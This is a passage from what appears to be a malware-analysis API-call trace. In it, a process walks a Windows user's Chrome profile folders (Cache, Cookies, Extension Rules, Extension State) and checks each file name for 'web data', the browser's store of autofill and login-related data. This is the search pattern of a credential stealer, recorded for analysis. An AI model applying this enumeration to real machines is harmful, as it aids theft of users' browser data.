(lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x574838 [0591.035] lstrlenW (lpString="Default") returned 7 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x63f8c8 [0591.035] LocalFree (hMem=0x574838) returned 0x0 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.035] lstrlenW (lpString="\\*.*") returned 4 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed570 [0591.035] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.035] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.035] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.035] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.035] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.035] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.035] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0591.035] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.035] lstrlenW (lpString="\\") returned 1 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed688 [0591.035] lstrlenW (lpString="Cache") returned 5 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0x10c) returned 0x5ed7a0 [0591.035] LocalFree (hMem=0x5ed688) returned 0x0 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.035] lstrlenW (lpString="\\*.*") returned 4 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63d7d8 [0591.035] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0x5b9b50 [0591.036] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.036] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.036] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.036] lstrlenW (lpString="\\") returned 1 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed688 [0591.036] lstrlenW (lpString="data_0") returned 6 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d900 [0591.036] LocalFree (hMem=0x5ed688) returned 0x0 [0591.036] StrStrIW (lpFirst="data_0", lpSrch="web data") returned 0x0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.036] lstrlenW (lpString="\\") returned 1 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed688 [0591.036] lstrlenW (lpString="data_1") returned 6 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63da28 [0591.036] LocalFree (hMem=0x5ed688) returned 0x0 [0591.036] StrStrIW (lpFirst="data_1", lpSrch="web data") returned 0x0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.036] lstrlenW (lpString="\\") returned 1 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed688 [0591.036] lstrlenW (lpString="data_2") returned 6 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63db50 [0591.036] LocalFree (hMem=0x5ed688) returned 0x0 [0591.036] StrStrIW (lpFirst="data_2", lpSrch="web data") returned 0x0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.036] lstrlenW (lpString="\\") returned 1 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed688 [0591.036] lstrlenW (lpString="data_3") returned 6 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63dc78 [0591.036] LocalFree (hMem=0x5ed688) returned 0x0 [0591.036] StrStrIW (lpFirst="data_3", lpSrch="web data") returned 0x0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.036] lstrlenW (lpString="\\") returned 1 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed688 [0591.036] lstrlenW (lpString="index") returned 5 [0591.036] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0591.036] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63dda0 [0591.036] LocalFree (hMem=0x5ed688) returned 0x0 [0591.036] StrStrIW (lpFirst="index", lpSrch="web data") returned 0x0 [0591.036] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0 [0591.036] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.036] LocalFree (hMem=0x63d7d8) returned 0x0 [0591.037] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.037] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.037] lstrlenW (lpString="\\") returned 1 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.037] lstrlenW (lpString="Cookies") returned 7 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5ed688 [0591.037] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.037] StrStrIW (lpFirst="Cookies", lpSrch="web data") returned 0x0 [0591.037] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.037] lstrlenW (lpString="\\") returned 1 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.037] lstrlenW (lpString="Cookies-journal") returned 15 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63d7d8 [0591.037] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.037] StrStrIW (lpFirst="Cookies-journal", lpSrch="web data") returned 0x0 [0591.037] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.037] lstrlenW (lpString="\\") returned 1 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.037] lstrlenW (lpString="Current Session") returned 15 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63dec8 [0591.037] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.037] StrStrIW (lpFirst="Current Session", lpSrch="web data") returned 0x0 [0591.037] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.037] lstrlenW (lpString="\\") returned 1 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.037] lstrlenW (lpString="Current Tabs") returned 12 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63dff0 [0591.037] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.037] StrStrIW (lpFirst="Current Tabs", lpSrch="web data") returned 0x0 [0591.037] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.037] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0591.037] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.037] lstrlenW (lpString="\\") returned 1 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.037] lstrlenW (lpString="data_reduction_proxy_leveldb") returned 28 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0591.037] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.037] lstrlenW (lpString="\\*.*") returned 4 [0591.037] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.037] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x574838 [0591.037] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*", lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0x5b9b50 [0591.038] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.038] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.038] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.038] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.038] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.038] lstrlenW (lpString="\\") returned 1 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0591.038] lstrlenW (lpString="000003.log") returned 10 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x150) returned 0x5e6088 [0591.038] LocalFree (hMem=0x5dbdf0) returned 0x0 [0591.038] StrStrIW (lpFirst="000003.log", lpSrch="web data") returned 0x0 [0591.038] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.038] lstrlenW (lpString="\\") returned 1 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0591.038] lstrlenW (lpString="CURRENT") returned 7 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x14a) returned 0x63f9d0 [0591.038] LocalFree (hMem=0x5dbdf0) returned 0x0 [0591.038] StrStrIW (lpFirst="CURRENT", lpSrch="web data") returned 0x0 [0591.038] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.038] lstrlenW (lpString="\\") returned 1 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0591.038] lstrlenW (lpString="LOCK") returned 4 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63fb28 [0591.038] LocalFree (hMem=0x5dbdf0) returned 0x0 [0591.038] StrStrIW (lpFirst="LOCK", lpSrch="web data") returned 0x0 [0591.038] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.038] lstrlenW (lpString="\\") returned 1 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0591.038] lstrlenW (lpString="LOG") returned 3 [0591.038] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0591.038] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63fc78 [0591.038] LocalFree (hMem=0x5dbdf0) returned 0x0 [0591.038] StrStrIW (lpFirst="LOG", lpSrch="web data") returned 0x0 [0591.038] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.038] lstrlenW (lpString="\\") returned 1 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0591.039] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0591.039] lstrlenW (lpString="MANIFEST-000002") returned 15 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0591.039] LocalAlloc (uFlags=0x40, uBytes=0x15a) returned 0x63fdc8 [0591.039] LocalFree (hMem=0x5dbdf0) returned 0x0 [0591.039] StrStrIW (lpFirst="MANIFEST-000002", lpSrch="web data") returned 0x0 [0591.039] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0 [0591.039] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.039] LocalFree (hMem=0x574838) returned 0x0 [0591.039] LocalFree (hMem=0x56cab0) returned 0x0 [0591.039] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.039] lstrcmpiW (lpString1="Extension Rules", lpString2=".") returned 1 [0591.039] lstrcmpiW (lpString1="Extension Rules", lpString2="..") returned 1 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.039] lstrlenW (lpString="\\") returned 1 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.039] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.039] lstrlenW (lpString="Extension Rules") returned 15 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.039] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63e118 [0591.039] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.039] lstrlenW (lpString="\\*.*") returned 4 [0591.039] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.039] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0591.039] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*", lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0x5b9b50 [0591.040] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.040] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.040] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.040] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.040] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.040] lstrlenW (lpString="\\") returned 1 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.040] lstrlenW (lpString="000003.log") returned 10 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0591.040] LocalFree (hMem=0x63be60) returned 0x0 [0591.040] StrStrIW (lpFirst="000003.log", lpSrch="web data") returned 0x0 [0591.040] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.040] lstrlenW (lpString="\\") returned 1 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.040] lstrlenW (lpString="CURRENT") returned 7 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bf98 [0591.040] LocalFree (hMem=0x63be60) returned 0x0 [0591.040] StrStrIW (lpFirst="CURRENT", lpSrch="web data") returned 0x0 [0591.040] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.040] lstrlenW (lpString="\\") returned 1 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.040] lstrlenW (lpString="LOCK") returned 4 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63c0d0 [0591.040] LocalFree (hMem=0x63be60) returned 0x0 [0591.040] StrStrIW (lpFirst="LOCK", lpSrch="web data") returned 0x0 [0591.040] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.040] lstrlenW (lpString="\\") returned 1 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.040] lstrlenW (lpString="LOG") returned 3 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63c208 [0591.040] LocalFree (hMem=0x63be60) returned 0x0 [0591.040] StrStrIW (lpFirst="LOG", lpSrch="web data") returned 0x0 [0591.040] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.040] lstrlenW (lpString="\\") returned 1 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0591.040] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.040] lstrlenW (lpString="MANIFEST-000001") returned 15 [0591.040] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0591.041] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0591.041] LocalFree (hMem=0x63be60) returned 0x0 [0591.041] StrStrIW (lpFirst="MANIFEST-000001", lpSrch="web data") returned 0x0 [0591.041] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0 [0591.041] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.041] LocalFree (hMem=0x63bd28) returned 0x0 [0591.041] LocalFree (hMem=0x63e118) returned 0x0 [0591.041] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.041] lstrcmpiW (lpString1="Extension State", lpString2=".") returned 1 [0591.041] lstrcmpiW (lpString1="Extension State", lpString2="..") returned 1 [0591.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.041] lstrlenW (lpString="\\") returned 1 [0591.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.041] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.041] lstrlenW (lpString="Extension State") returned 15 [0591.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.041] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63e118 [0591.041] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.041] lstrlenW (lpString="\\*.*") returned 4 [0591.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.041] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0591.041] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*", lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0x5b9b50 [0591.042] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.042] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.042] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.042] lstrlenW (lpString="\\") returned 1 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.042] lstrlenW (lpString="000003.log") returned 10 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbf38 [0591.042] LocalFree (hMem=0x63be60) returned 0x0 [0591.042] StrStrIW (lpFirst="000003.log", lpSrch="web data") returned 0x0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.042] lstrlenW (lpString="\\") returned 1 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.042] lstrlenW (lpString="CURRENT") returned 7 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63c340 [0591.042] LocalFree (hMem=0x63be60) returned 0x0 [0591.042] StrStrIW (lpFirst="CURRENT", lpSrch="web data") returned 0x0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.042] lstrlenW (lpString="\\") returned 1 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.042] lstrlenW (lpString="LOCK") returned 4 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63c478 [0591.042] LocalFree (hMem=0x63be60) returned 0x0 [0591.042] StrStrIW (lpFirst="LOCK", lpSrch="web data") returned 0x0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.042] lstrlenW (lpString="\\") returned 1 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.042] lstrlenW (lpString="LOG") returned 3 [0591.042] lstrlenW 